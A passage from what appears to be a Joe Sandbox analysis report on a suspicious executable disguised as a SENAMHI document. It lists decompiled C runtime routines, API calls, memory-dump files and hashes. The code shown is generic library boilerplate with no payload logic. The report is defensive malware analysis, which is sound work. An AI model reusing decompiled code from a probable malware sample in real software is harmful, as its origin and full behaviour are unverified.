    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    • Opcode ID: 134bd4b906e6f200d84626489d9745ff1c0d1ca06660fd542575985ab0f6ce4e
    • Instruction ID: e166b5dea29c70e5f5a2b2e6964ff7e8b827c4317525e2ed4864d52163d8478d
    • Opcode Fuzzy Hash: 134bd4b906e6f200d84626489d9745ff1c0d1ca06660fd542575985ab0f6ce4e
    • Instruction Fuzzy Hash: 8F210531E21220FBCB214F649D85A5A3759DF49762F250213ED26AF290E771DD08CAD2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0015BD49(intOrPtr _a4) {
    				void* _t18;
    
    				_t45 = _a4;
    				if(_a4 != 0) {
    					E0015BD11(_t45, 7);
    					E0015BD11(_t45 + 0x1c, 7);
    					E0015BD11(_t45 + 0x38, 0xc);
    					E0015BD11(_t45 + 0x68, 0xc);
    					E0015BD11(_t45 + 0x98, 2);
    					E00158B82( *((intOrPtr*)(_t45 + 0xa0)));
    					E00158B82( *((intOrPtr*)(_t45 + 0xa4)));
    					E00158B82( *((intOrPtr*)(_t45 + 0xa8)));
    					E0015BD11(_t45 + 0xb4, 7);
    					E0015BD11(_t45 + 0xd0, 7);
    					E0015BD11(_t45 + 0xec, 0xc);
    					E0015BD11(_t45 + 0x11c, 0xc);
    					E0015BD11(_t45 + 0x14c, 2);
    					E00158B82( *((intOrPtr*)(_t45 + 0x154)));
    					E00158B82( *((intOrPtr*)(_t45 + 0x158)));
    					E00158B82( *((intOrPtr*)(_t45 + 0x15c)));
    					return E00158B82( *((intOrPtr*)(_t45 + 0x160)));
    				}
    				return _t18;
    			}


    APIs
      • Part of subcall function 0015BD11: _free.LIBCMT ref: 0015BD36
    • _free.LIBCMT ref: 0015BD97
      • Part of subcall function 00158B82: HeapFree.KERNEL32(00000000,00000000,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?), ref: 00158B98
      • Part of subcall function 00158B82: GetLastError.KERNEL32(?,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?,?), ref: 00158BAA
    • _free.LIBCMT ref: 0015BDA2
    • _free.LIBCMT ref: 0015BDAD
    • _free.LIBCMT ref: 0015BE01
    • _free.LIBCMT ref: 0015BE0C
    • _free.LIBCMT ref: 0015BE17
    • _free.LIBCMT ref: 0015BE22
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 525e5c658dd9c6b21af90f0a18bfdc04389eb2df5792fc6ff52ccae0de6d7f38
    • Instruction ID: 5835e09d4011658d3c29256ba8ffd848e58fab0e1974d96503010dba6d27a571
    • Opcode Fuzzy Hash: 525e5c658dd9c6b21af90f0a18bfdc04389eb2df5792fc6ff52ccae0de6d7f38
    • Instruction Fuzzy Hash: 64112171544B04EED920BBF0CC87FCB77ACEF14716F644815BAB96E052DB65B6084B50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 18%
    			E001513BB(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
    				struct HINSTANCE__* _t7;
    				_Unknown_base(*)()* _t8;
    				intOrPtr* _t12;
    
    				_t12 = __ecx;
    				if( *__ecx == 0) {
    					if( *((intOrPtr*)(__ecx + 4)) == 0) {
    						L6:
    						return 1;
    					}
    					return RegDeleteKeyA();
    				}
    				_t7 = GetModuleHandleA("Advapi32.dll");
    				if(_t7 == 0) {
    					goto L6;
    				}
    				_t8 = GetProcAddress(_t7, "RegDeleteKeyTransactedA");
    				if(_t8 == 0) {
    					goto L6;
    				}
    				return  *_t8(_a4, _a8, 0, 0,  *_t12, 0);
    			}

    APIs
    • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 001513CD
    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 001513DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: Advapi32.dll$RegDeleteKeyTransactedA$Mv@Nv$Nv
    • API String ID: 1646373207-3267374244
    • Opcode ID: 26b998e1077cd3e8612a7403cc969c2f964097d1f5167f85bd2d84cccd1b0b9d
    • Instruction ID: c0c537436d8ec9e7e72e00e4de47150bc6bbe9be99e616db721cbb89ee806f92
    • Opcode Fuzzy Hash: 26b998e1077cd3e8612a7403cc969c2f964097d1f5167f85bd2d84cccd1b0b9d
    • Instruction Fuzzy Hash: 0FF03732210504FADB221FA7DC09EA7B7ADEBD6B63708843AF961C9410D7718896D760
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E00157C13(void* __ecx, intOrPtr _a4) {
    				signed int _v8;
    				_Unknown_base(*)()* _t8;
    				_Unknown_base(*)()* _t14;
    
    				_v8 = _v8 & 0x00000000;
    				_t8 =  &_v8;
    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
    				if(_t8 != 0) {
    					_t8 = GetProcAddress(_v8, "CorExitProcess");
    					_t14 = _t8;
    					if(_t14 != 0) {
    						 *0x161278(_a4);
    						_t8 =  *_t14();
    					}
    				}
    				if(_v8 != 0) {
    					return FreeLibrary(_v8);
    				}
    				return _t8;
    			}

    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00157BC5,?,?,00157B8D,?,00000000,?), ref: 00157C28
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00157C3B
    • FreeLibrary.KERNEL32(00000000,?,?,00157BC5,?,?,00157B8D,?,00000000,?), ref: 00157C5E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll$Nv
    • API String ID: 4061214504-3362585832
    • Opcode ID: c58244ef2a3470b2a47c376b59eba26a1f857d5df3043f34c989a4ef173cef29
    • Instruction ID: 81b1cdd7949e9e50e665f70bd6e256752ed59d41ec76bf3f36503e10a0ae8bec
    • Opcode Fuzzy Hash: c58244ef2a3470b2a47c376b59eba26a1f857d5df3043f34c989a4ef173cef29
    • Instruction Fuzzy Hash: 07F03031601619FBDB119B65EE0ABDE7B79EB00756F1401A4FA01E65A0CBB18F84EB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0015D4C5(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v16;
    				char _v23;
    				char _v24;
    				void _v32;
    				signed int _v33;
    				signed char _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				char _v51;
    				void _v52;
    				long _v56;
    				char _v60;
    				intOrPtr _v68;
    				char _v72;
    				struct _OVERLAPPED* _v76;
    				signed char _v80;
    				signed int _v84;
    				signed int _v88;
    				char _v92;
    				intOrPtr _v96;
    				long _v100;
    				signed char* _v104;
    				signed char* _v108;
    				void* _v112;
    				intOrPtr _v116;
    				char _v120;
    				int _v124;
    				intOrPtr _v128;
    				struct _OVERLAPPED* _v132;
    				struct _OVERLAPPED* _v136;
    				struct _OVERLAPPED* _v140;
    				struct _OVERLAPPED* _v144;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t170;
    				signed int _t172;
    				int _t178;
    				intOrPtr _t183;
    				intOrPtr _t186;
    				void* _t188;
    				void* _t190;
    				long _t193;
    				void _t198;
    				signed char* _t202;
    				void* _t206;
    				struct _OVERLAPPED* _t211;
    				void* _t220;
    				long _t224;
    				intOrPtr _t225;
    				char _t227;
    				void* _t237;
    				signed int _t242;
    				intOrPtr _t245;
    				signed int _t248;
    				signed int _t249;
    				signed int _t251;
    				intOrPtr _t253;
    				void* _t259;
    				intOrPtr _t260;
    				signed int _t261;
    				signed char _t264;
    				intOrPtr _t267;
    				signed char* _t269;
    				signed int _t272;
    				signed int _t273;
    				signed int _t277;
    				signed int _t278;
    				intOrPtr _t279;
    				signed int _t280;
    				struct _OVERLAPPED* _t282;
    				struct _OVERLAPPED* _t284;
    				signed int _t285;
    				void* _t286;
    				void* _t287;
    
    				_t170 =  *0x169008; // 0x26a91022
    				_v8 = _t170 ^ _t285;
    				_t172 = _a8;
    				_t264 = _t172 >> 6;
    				_t242 = (_t172 & 0x0000003f) * 0x38;
    				_t269 = _a12;
    				_v108 = _t269;
    				_v80 = _t264;
    				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x292960 + _t264 * 4)) + 0x18));
    				_v44 = _t242;
    				_v96 = _a16 + _t269;
    				_t178 = GetConsoleOutputCP();
    				_t241 = 0;
    				_v124 = _t178;
    				E001570E3( &_v72, _t264, 0);
    				_t273 = 0;
    				_v92 = 0;
    				_v88 = 0;
    				_v84 = 0;
    				_t245 =  *((intOrPtr*)(_v68 + 8));
    				_v128 = _t245;
    				_v104 = _t269;
    				if(_t269 >= _v96) {
    					L48:
    					__eflags = _v60 - _t241;
    				} else {
    					while(1) {
    						_t248 = _v44;
    						_v51 =  *_t269;
    						_v76 = _t241;
    						_v40 = 1;
    						_t186 =  *((intOrPtr*)(0x292960 + _v80 * 4));
    						_v48 = _t186;
    						if(_t245 != 0xfde9) {
    							goto L19;
    						}
    						_t211 = _t241;
    						_t267 = _v48 + 0x2e + _t248;
    						_v116 = _t267;
    						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
    							_t211 =  &(_t211->Internal);
    							if(_t211 < 5) {
    								continue;
    							}
    							break;
    						}
    						_t264 = _v96 - _t269;
    						_v40 = _t211;
    						if(_t211 <= 0) {
    							_t72 = ( *_t269 & 0x000000ff) + 0x169760; // 0x0
    							_t253 =  *_t72 + 1;
    							_v48 = _t253;
    							__eflags = _t253 - _t264;
    							if(_t253 > _t264) {
    								__eflags = _t264;
    								if(_t264 <= 0) {
    									goto L40;
    								} else {
    									_t278 = _v44;
    									do {
    										 *((char*)( *((intOrPtr*)(0x292960 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
    										_t241 =  &(_t241->Internal);
    										__eflags = _t241 - _t264;
    									} while (_t241 < _t264);
    									goto L39;
    								}
    							} else {
    								_v144 = _t241;
    								__eflags = _t253 - 4;
    								_v140 = _t241;
    								_v56 = _t269;
    								_v40 = (_t253 == 4) + 1;
    								_t220 = E0015C7FA( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
    								_t287 = _t286 + 0x10;
    								__eflags = _t220 - 0xffffffff;
    								if(_t220 == 0xffffffff) {
    									goto L48;
    								} else {
    									_t279 = _v48;
    									goto L18;
    								}
    							}
    						} else {
    							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x169760)) + 1;
    							_v56 = _t224;
    							_t225 = _t224 - _v40;
    							_v48 = _t225;
    							if(_t225 > _t264) {
    								__eflags = _t264;
    								if(_t264 > 0) {
    									_t280 = _t248;
    									do {
    										_t227 =  *((intOrPtr*)(_t241 + _t269));
    										_t259 =  *((intOrPtr*)(0x292960 + _v80 * 4)) + _t280 + _t241;
    										_t241 =  &(_t241->Internal);
    										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
    										_t280 = _v44;
    										__eflags = _t241 - _t264;
    									} while (_t241 < _t264);
    									L39:
    									_t273 = _v88;
    								}
    								L40:
    								_t277 = _t273 + _t264;
    								__eflags = _t277;
    								L41:
    								__eflags = _v60;
    								_v88 = _t277;
    							} else {
    								_t264 = _v40;
    								_t282 = _t241;
    								_t260 = _v116;
    								do {
    									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
    									_t282 =  &(_t282->Internal);
    								} while (_t282 < _t264);
    								_t283 = _v48;
    								_t261 = _v44;
    								if(_v48 > 0) {
    									E001556D0( &_v16 + _t264, _t269, _t283);
    									_t261 = _v44;
    									_t286 = _t286 + 0xc;
    									_t264 = _v40;
    								}
    								_t272 = _v80;
    								_t284 = _t241;
    								do {
    									 *( *((intOrPtr*)(0x292960 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
    									_t284 =  &(_t284->Internal);
    								} while (_t284 < _t264);
    								_t269 = _v104;
    								_t279 = _v48;
    								_v120 =  &_v16;
    								_v136 = _t241;
    								_v132 = _t241;
    								_v40 = (_v56 == 4) + 1;
    								_t237 = E0015C7FA( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
    								_t287 = _t286 + 0x10;
    								if(_t237 == 0xffffffff) {
    									goto L48;
    								} else {
    									L18:
    									_t269 = _t269 - 1 + _t279;
    									L27:
    									_t269 =  &(_t269[1]);
    									_v104 = _t269;
    									_t193 = E0015B146(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
    									_t286 = _t287 + 0x20;
    									_v56 = _t193;
    									if(_t193 == 0) {
    										goto L48;
    									} else {
    										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
    											L47:
    											_v92 = GetLastError();
    											goto L48;
    										} else {
    											_t273 = _v84 - _v108 + _t269;
    											_v88 = _t273;
    											if(_v100 < _v56) {
    												goto L48;
    											} else {
    												if(_v51 != 0xa) {
    													L34:
    													if(_t269 >= _v96) {
    														goto L48;
    													} else {
    														_t245 = _v128;
    														continue;
    													}
    												} else {
    													_t198 = 0xd;
    													_v52 = _t198;
    													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
    														goto L47;
    													} else {
    														if(_v100 < 1) {
    															goto L48;
    														} else {
    															_v84 = _v84 + 1;
    															_t273 = _t273 + 1;
    															_v88 = _t273;
    															goto L34;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L49;
    						L19:
    						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
    						__eflags = _t264 & 0x00000004;
    						if((_t264 & 0x00000004) == 0) {
    							_v33 =  *_t269;
    							_t188 = E0015BE2D(_t264);
    							_t249 = _v33 & 0x000000ff;
    							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
    							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
    								_push(1);
    								_push(_t269);
    								goto L26;
    							} else {
    								_t100 =  &(_t269[1]); // 0x1
    								_t202 = _t100;
    								_v56 = _t202;
    								__eflags = _t202 - _v96;
    								if(_t202 >= _v96) {
    									_t264 = _v80;
    									_t251 = _v44;
    									_t241 = _v33;
    									 *((char*)(_t251 +  *((intOrPtr*)(0x292960 + _t264 * 4)) + 0x2e)) = _v33;
    									 *(_t251 +  *((intOrPtr*)(0x292960 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x292960 + _t264 * 4)) + 0x2d) | 0x00000004;
    									_t277 = _t273 + 1;
    									goto L41;
    								} else {
    									_t206 = E00158D4C( &_v76, _t269, 2);
    									_t287 = _t286 + 0xc;
    									__eflags = _t206 - 0xffffffff;
    									if(_t206 == 0xffffffff) {
    										goto L48;
    									} else {
    										_t269 = _v56;
    										goto L27;
    									}
    								}
    							}
    						} else {
    							_t264 = _t264 & 0x000000fb;
    							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
    							_v23 =  *_t269;
    							_push(2);
    							 *(_t248 + _v48 + 0x2d) = _t264;
    							_push( &_v24);
    							L26:
    							_push( &_v76);
    							_t190 = E00158D4C();
    							_t287 = _t286 + 0xc;
    							__eflags = _t190 - 0xffffffff;
    							if(_t190 == 0xffffffff) {
    								goto L48;
    							} else {
    								goto L27;
    							}
    						}
    						goto L49;
    					}
    				}
    				L49:
    				if(__eflags != 0) {
    					_t183 = _v72;
    					_t165 = _t183 + 0x350;
    					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
    					__eflags =  *_t165;
    				}
    				__eflags = _v8 ^ _t285;
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				return E0015403C(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
    			}

    APIs
    • GetConsoleOutputCP.KERNEL32(00000000,?,?), ref: 0015D50D
    • __fassign.LIBCMT ref: 0015D6F2
    • __fassign.LIBCMT ref: 0015D70F
    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0015D757
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0015D797
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0015D83F
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
    • String ID:
    • API String ID: 1735259414-0
    • Opcode ID: 8c785b55b75b65f30b9ffe9a94c463a6355bc8cfd121740bad7607928bd3a96f
    • Instruction ID: dad2bf53ee91e613709a5ba7273f858660e86692b324ecc88bf149c50d6e3844
    • Opcode Fuzzy Hash: 8c785b55b75b65f30b9ffe9a94c463a6355bc8cfd121740bad7607928bd3a96f
    • Instruction Fuzzy Hash: 7DC19C75D00298DFCB25CFA8D8809EDBBB5EF58315F28416AE825FB241D731994ACB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00155DDA(void* __ecx) {
    				void* _t4;
    				void* _t8;
    				void* _t11;
    				void* _t13;
    				void* _t14;
    				void* _t18;
    				void* _t23;
    				long _t24;
    				void* _t27;
    
    				_t13 = __ecx;
    				if( *0x169020 != 0xffffffff) {
    					_t24 = GetLastError();
    					_t11 = E00156F9D(_t13, __eflags,  *0x169020);
    					_t14 = _t23;
    					__eflags = _t11 - 0xffffffff;
    					if(_t11 == 0xffffffff) {
    						L5:
    						_t11 = 0;
    					} else {
    						__eflags = _t11;
    						if(__eflags == 0) {
    							_t4 = E00156FD8(_t14, __eflags,  *0x169020, 0xffffffff);
    							__eflags = _t4;
    							if(_t4 != 0) {
    								_push(0x28);
    								_t27 = E00158AC4();
    								_t18 = 1;
    								__eflags = _t27;
    								if(__eflags == 0) {
    									L8:
    									_t11 = 0;
    									E00156FD8(_t18, __eflags,  *0x169020, 0);
    								} else {
    									_t8 = E00156FD8(_t18, __eflags,  *0x169020, _t27);
    									_pop(_t18);
    									__eflags = _t8;
    									if(__eflags != 0) {
    										_t11 = _t27;
    										_t27 = 0;
    										__eflags = 0;
    									} else {
    										goto L8;
    									}
    								}
    								E00157188(_t27);
    							} else {
    								goto L5;
    							}
    						}
    					}
    					SetLastError(_t24);
    					return _t11;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetLastError.KERNEL32(?,?,00155DD1,00155516,00154B3F), ref: 00155DE8
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00155DF6
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00155E0F
    • SetLastError.KERNEL32(00000000,00155DD1,00155516,00154B3F), ref: 00155E61
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: e3939f5a508092413adc2ca91df2dc5e44f57b8b44d5d41b1f3a525fa0669e26
    • Instruction ID: 37ddd41342847adf41702783f6c935d1f633519e7f053ca176c0ceaf55c0beff
    • Opcode Fuzzy Hash: e3939f5a508092413adc2ca91df2dc5e44f57b8b44d5d41b1f3a525fa0669e26
    • Instruction Fuzzy Hash: B101283360CB25EE9B1417B47CA666B666EDB25777770022AFD304E4E0EFA11C489140
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0015A6B8(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
    				intOrPtr _t14;
    				intOrPtr _t15;
    				intOrPtr _t17;
    				intOrPtr _t36;
    				intOrPtr* _t38;
    				intOrPtr _t39;
    
    				_t38 = _a4;
    				if(_t38 != 0) {
    					__eflags =  *_t38;
    					if( *_t38 != 0) {
    						_t14 = E0015B146(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
    						__eflags = _t14;
    						if(__eflags != 0) {
    							_t36 = _a8;
    							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
    							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
    								L10:
    								_t15 = E0015B146(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
    								__eflags = _t15;
    								if(__eflags != 0) {
    									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
    									_t17 = 0;
    									__eflags = 0;
    								} else {
    									E0015759E(GetLastError());
    									_t17 =  *((intOrPtr*)(E001575D4(__eflags)));
    								}
    								L13:
    								L14:
    								return _t17;
    							}
    							_t17 = E0015A77F(_t36, _t14);
    							__eflags = _t17;
    							if(_t17 != 0) {
    								goto L13;
    							}
    							goto L10;
    						}
    						E0015759E(GetLastError());
    						_t17 =  *((intOrPtr*)(E001575D4(__eflags)));
    						goto L14;
    					}
    					_t39 = _a8;
    					__eflags =  *((intOrPtr*)(_t39 + 0xc));
    					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
    						L5:
    						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
    						_t17 = 0;
    						 *((intOrPtr*)(_t39 + 0x10)) = 0;
    						goto L14;
    					}
    					_t17 = E0015A77F(_t39, 1);
    					__eflags = _t17;
    					if(_t17 != 0) {
    						goto L14;
    					}
    					goto L5;
    				}
    				E0015A7A6(_a8);
    				return 0;
    			}

    Strings
    • C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe, xrefs: 0015A6BD
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID:
    • String ID: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
    • API String ID: 0-3192360390
    • Opcode ID: 0c62c5a7ea5792cc780317d7a4952132301643130da49aab52f650be34a36845
    • Instruction ID: 293959b01e405a2f47237c2081588eb0e5ffb836cd7d5cc0467558cef2e2d37a
    • Opcode Fuzzy Hash: 0c62c5a7ea5792cc780317d7a4952132301643130da49aab52f650be34a36845
    • Instruction Fuzzy Hash: D521AC71248205EF9B20AF709CC196A7BBCAF283667504714FD358E191EB22EC4887A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00156E42(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				signed int _t11;
    				WCHAR* _t12;
    				struct HINSTANCE__* _t16;
    				struct HINSTANCE__* _t18;
    				signed int* _t22;
    				signed int* _t26;
    				struct HINSTANCE__* _t29;
    				WCHAR* _t31;
    				void* _t32;
    
    				_t26 = _a4;
    				while(_t26 != _a8) {
    					_t11 =  *_t26;
    					_t22 = 0x2927c4 + _t11 * 4;
    					_t29 =  *_t22;
    					if(_t29 == 0) {
    						_t12 =  *(0x161dbc + _t11 * 4);
    						_v8 = _t12;
    						_t29 = LoadLibraryExW(_t12, 0, 0x800);
    						if(_t29 != 0) {
    							L13:
    							 *_t22 = _t29;
    							if( *_t22 != 0) {
    								FreeLibrary(_t29);
    							}
    							L15:
    							_t16 = _t29;
    							L12:
    							return _t16;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L8:
    							 *_t22 = _t18 | 0xffffffff;
    							L9:
    							_t26 =  &(_t26[1]);
    							continue;
    						}
    						_t31 = _v8;
    						_t18 = E00158B48(_t31, L"api-ms-", 7);
    						_t32 = _t32 + 0xc;
    						if(_t18 == 0) {
    							goto L8;
    						}
    						_t18 = LoadLibraryExW(_t31, 0, 0);
    						_t29 = _t18;
    						if(_t29 != 0) {
    							goto L13;
    						}
    						goto L8;
    					}
    					if(_t29 != 0xffffffff) {
    						goto L15;
    					}
    					goto L9;
    				}
    				_t16 = 0;
    				goto L12;
    			}

    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,?,00156F05,?,?,0029276C,00000000,?,00157030,00000004,InitializeCriticalSectionEx,00161EB0,InitializeCriticalSectionEx,00000000), ref: 00156ED3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
